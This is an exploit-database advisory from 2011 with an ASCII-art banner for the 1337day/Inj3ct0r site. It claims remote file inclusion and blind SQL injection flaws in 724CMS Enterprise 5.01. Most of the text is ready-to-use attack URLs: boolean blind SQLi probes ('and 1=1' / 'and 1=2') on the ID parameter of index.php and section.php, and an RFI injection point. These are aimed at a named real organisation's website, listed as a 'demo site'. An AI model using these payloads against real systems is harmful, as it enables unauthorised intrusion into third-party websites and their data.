#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : 1337day.com 0 #1 [+] Support e-mail : submit[at]1337day.com 1 #0 0 #1 ######################################## 1 #0 I'm OuTLaWz member from Inj3ct0r Team 1 #1 ######################################## 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # spl0itz title: 724CMS Eneterprise (index.php) (section.php) (RFI/Blind SQL Injection) Multiple Vulnerabilities # date: 31/08/2011 # author: OuTLaWz aka The_Exploited # vendor: http://www.724cms.com/ # version: 5.01 # category:: webapps # google dork: no dork bro, is for the lamer ;) # tested on: windows seven 32bit # demo site: http://www.inuitcircumpolar.com/ # vuln url: http://www.inuitcircumpolar.com/section.php?ID=6 # blind sqli: http://www.inuitcircumpolar.com/index.php?ID=1 and 1=1 //\\ http://www.inuitcircumpolar.com/index.php?ID=1 and 1=2 # blind sqli: http://www.inuitcircumpolar.com/section.php?ID=6 and 1=1 //\\ http://www.inuitcircumpolar.com/section.php?ID=6 and 1=2 # rfi: http://www.inuitcircumpolar.com/section.php?ID=[RFI] // 2Pac R.I.P.